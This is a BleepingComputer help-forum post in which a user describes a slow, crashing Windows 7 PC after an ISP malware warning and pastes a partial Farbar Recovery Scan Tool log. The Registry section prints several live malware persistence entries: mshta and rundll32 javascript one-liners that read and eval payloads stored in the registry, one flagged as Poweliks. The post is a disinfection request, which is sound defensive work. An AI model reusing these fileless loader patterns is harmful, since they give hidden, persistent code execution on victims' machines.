Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

I got an email from my ISP stating I may be infected with Alureon / TDSS Virus


  • This topic is locked This topic is locked
30 replies to this topic

#1 therrrn

therrrn

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 03 February 2016 - 04:34 AM

My computer is running super slow out of nowhere, which I know is not always a sign of a virus or malware. This happens from time to time and my computer is getting pretty old, so I usually figure that's what it is. Usually, I'll restart it and then it starts updating Windows and takes forever, but once it's done, it seems to work fine. At least, it does for a few days to a week and then I do it again. The other day, I got this email from Cox saying that a computer connected to the internet at the house may be infected with this virus. My computer is the only one connected. I instantly ran a scan on Avast and nothing was found. Then after I got this email, almost every program I use started "Not Responding" every other second and freezing like crazy. I was trying to use my Word Starter program and I just basically couldn't. It was freezing after every letter I typed. I went into Control Panel, Programs and Features and "repaired" the program. That seemed to work a bit, but it wasn't working perfectly like before. I tried running a full scan again and this time, it said threats were detected. When I tried to click the button to fix it, my computer completely froze for about 20 minutes. When it unfroze, it said something about how the files were corrupted or something along those lines. Then it froze again. I tried to restart it and halfway through restarting, my screen went blue and these words were on screen:

 

STOP: c000021a {Fatal System Error}

The initial session process or syste process terminated unexpectedly with a sta

tus of 0x00000000 (0xc0000001 0x00010868).

The system has been shut down

 

I turned it off and turned it back on and it turned on just fine. Now, the computer is being somewhat ok, just everything is still (Not Responding) every few minutes now, instead of every other second. 

 

FRST.txt log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016

Ran by Owner (administrator) on ERIN (03-02-2016 00:56:45)
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner & postgres (Available Profiles: Owner & postgres)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\ToolbarUpdater.exe
(Intel® Corporation) C:\Program Files\Intel\WiMAX\Bin\AppSrv.exe
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\loggingserver.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Red Bend Ltd.) C:\Program Files\Intel\WiMAX\Bin\DMAgent.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
() C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\STService.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel® Corporation) C:\Program Files\Intel\WiMAX\Bin\WiMAXCU.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(BitTorrent Inc.) C:\Users\Owner\AppData\Local\Temp\HYD77A0.tmp.1454489024_permissionsCopy\uTorrent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2122536 2010-05-07] (Synaptics Incorporated)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10144288 2010-04-13] (Realtek Semiconductor)
HKLM\...\Run: [IntelWireless] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1928976 2010-03-05] (Intel® Corporation)
HKLM\...\Run: [IntelWirelessWiMAX] => C:\Program Files\Intel\WiMAX\Bin\WiMAXCU.exe [1449984 2010-10-03] (Intel® Corporation)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7021880 2016-01-13] (AVAST Software)
HKLM-x32\...\Run: [**26bf4b46<*>] => mshta javascript:rXOH8WLW="tGumlmgk2b";L7C6=new%20ActiveXObject("WScript.Shell");NJk5qVRD="sAn0KJN";lM6lp=L7C6.RegRead("HKLM\\software\\Wow6432Node\\2ac6ccfc33\\bfe154c4");o2ED5vECMd="qE";eval(lM6lp); (the data entry has 18 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-12-22] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
HKLM-x32\...\RunOnce: [Launcher] => C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\Launcher.exe [163040 2010-08-11] (Softthinks)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [**e5f34806<*>] => mshta javascript:KNi8K5ub="QPC33YyeF";D5V5=new%20ActiveXObject("WScript.Shell");euiaPgY8b="Cx2S";CZ8NC=D5V5.RegRead("HKLM\\software\\Wow6432Node\\2ac6ccfc33\\bfe154c4");VkCHg93f="Fz";eval(CZ8NC);lcseF (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Run: [Google Update] => C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-31] (Google Inc.)
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Run: [**26bf4b46<*>] => mshta javascript:LAjpmIq4="a1YS4";aR3=new%20ActiveXObject("WScript.Shell");uHc2LtCR="lnWFUZXik4";AZ2t2p=aR3.RegRead("HKCU\\software\\2ac6ccfc33\\bfe154c4");U2XUULY="dyk";eval(AZ2t2p);jDxZHdx5I="ASx2PF (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [899584 2010-11-20] (Microsoft Corporation)
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"jq8\..\mshtml,RunHTMLApplication ";eval("usxzcsqf7<odv!@buhwdYNckdbu)#VRbsh (the data entry has 28617 more characters). <==== Poweliks!
HKU\S-1-5-21-2923065098-2265594029-2962721977-1005\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-01-13] (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk [2011-01-17]
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (Microsoft)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2011-01-17]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk [2011-01-17]
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (Microsoft)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2011-01-17]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\postgres\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk [2011-01-17]
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (Microsoft)
Startup: C:\Users\postgres\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2011-01-17]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{078B087B-2F04-441C-B898-582CCC5D9236}: [DhcpNameServer] 68.111.16.25 68.111.16.30
Tcpip\..\Interfaces\{3DE5FF03-1AB6-480F-8FF4-A748166BC0F6}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{709B40FF-8646-458D-9811-B527DD3EB7C2}: [NameServer] 0.0.0.0
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com?fr=hp-avast&type=avastbcl
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com?fr=hp-avast&type=avastbcl
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxps://www.yahoo.com?fr=hp-avast&type=avastbcl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {3C0B9203-745F-446D-81C7-77ED9BAA6977} URL = hxxp://www.bing.com/search?q={searchTerms}&amp;form=DLCDF8&amp;pc=MDDC&amp;src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM-x32 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> SuggestionsURL_JSON hxxp://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> {3C0B9203-745F-446D-81C7-77ED9BAA6977} URL = 
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://mysearch.avg.com/search?cid={FF4A171E-C3AB-4989-AA8E-AEBD661F0BD8}&mid=b1b33dd3302c47d3aee02104e484cc7b-91d57b6c0a0399f3896f660d2ad5acde1a0061f2&lang=en&ds=oc011&coid=avgtbdisoc&cmpid=&pr=sa&d=2014-06-10 02:42:01&v=18.1.0.443&pid=safeguard&sg=&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-01-13] (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_72\bin\ssv.dll [2016-01-27] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-01-13] (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_72\bin\jp2ssv.dll [2016-01-27] (Oracle Corporation)
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} hxxp://l.yimg.com/jh/games/popcap/zuma/popcaploader_v6.cab
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2011-10-10] (Skype Technologies S.A.)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.7\ViProtocol.dll [2014-06-11] (AVG Secure Search)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2016-01-14] ()
FF Plugin: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll [2010-10-13] (Best Buy)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2016-01-14] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.7\\npsitesafety.dll [No File]
FF Plugin-x32: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll [2010-10-13] (Best Buy)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-07-12] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.72.2 -> C:\Program Files (x86)\Java\jre1.8.0_72\bin\dtplugin\npDeployJava1.dll [2016-01-27] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.72.2 -> C:\Program Files (x86)\Java\jre1.8.0_72\bin\plugin2\npjp2.dll [2016-01-27] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-22] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-22] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @spoon.net/Spoon Plugin 3.33 -> C:\Users\Owner\AppData\Local\Spoon\3.33.6.244\npMozillaSpoonPlugin.dll [No File]
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @talk.google.com/O1DPlugin -> C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Owner\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Owner\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-01-13]
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-01-13]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://search.conduit.com/?ctid=CT3324790&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=4&UP=SPD5AB1073-39FB-4384-AAB4-904BCB7A9792&SSPV=SE1CG2_sp_ch
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Angry Birds) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj [2014-12-14]
CHR Extension: (BeFunky Photo Editor) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apfkepiiddolifkgjmfdgpnipgnfejab [2015-04-13]
CHR Extension: (Cloud To Butt Plus) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apmlngnhgbnjpajelfkmabhkfapgnoai [2015-02-26]
CHR Extension: (Ebates Cash Back) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhjbpecpncaggjpdakmflnfcopglcmi [2016-01-13]
CHR Extension: (timeStats) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejifodhjoeeenihgfpjijjmpomaphmah [2015-06-04]
CHR Extension: (AdBlock) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-01-27]
CHR Extension: (Emoji Input by EmojiStuff.com) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\immhpnclomdloikkpcefncmfgjbkojmh [2016-01-02]
CHR Extension: (Cargo Bridge) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\keembkgclppcbilkekfgpobhldjjhpmn [2014-08-28]
CHR Extension: (Little Alchemy) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\knkapnclbofjjgicpkfoagdjohlfjhpd [2015-06-16]
CHR Extension: (Skype) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-01-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-30]
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-28]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-28]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-28]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-02-28]
CHR Extension: (Google Search) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-13]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-28]
CHR Extension: (Avast Online Security) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gomekmidlodglbbmalcneegieacbdmki [2015-04-13]
